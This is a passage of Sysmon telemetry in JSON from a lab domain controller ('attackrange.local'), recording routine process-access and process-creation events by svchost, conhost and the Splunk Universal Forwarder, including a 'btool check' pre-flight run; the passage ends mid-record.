{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3685,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3686,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3687,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3688,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3689,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.791\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010468E0500}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.791","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010468E0500}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3690,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.026\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010468E0500}\r\nSourceProcessId: 4552\r\nSourceThreadId: 4708\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.026","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010468E0500}","SourceProcessId":"4552","SourceThreadId":"4708","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3691,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.026\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010468E0500}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.026","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010468E0500}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3692,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.069\r\nProcessGuid: {E2A3D6B1-1105-5F25-0000-0010FE900500}\r\nProcessId: 4704\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nParentProcessId: 3828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.069","ProcessGuid":"{E2A3D6B1-1105-5F25-0000-0010FE900500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","ParentProcessId":"3828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3693,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:49.057\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nSourceProcessId: 3828\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-1105-5F25-0000-0010FE900500}\r\nTargetProcessId: 4704\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:49.057","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","SourceProcessId":"3828","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-1105-5F25-0000-0010FE900500}","TargetProcessId":"4704","TargetImage":"C:\\Program 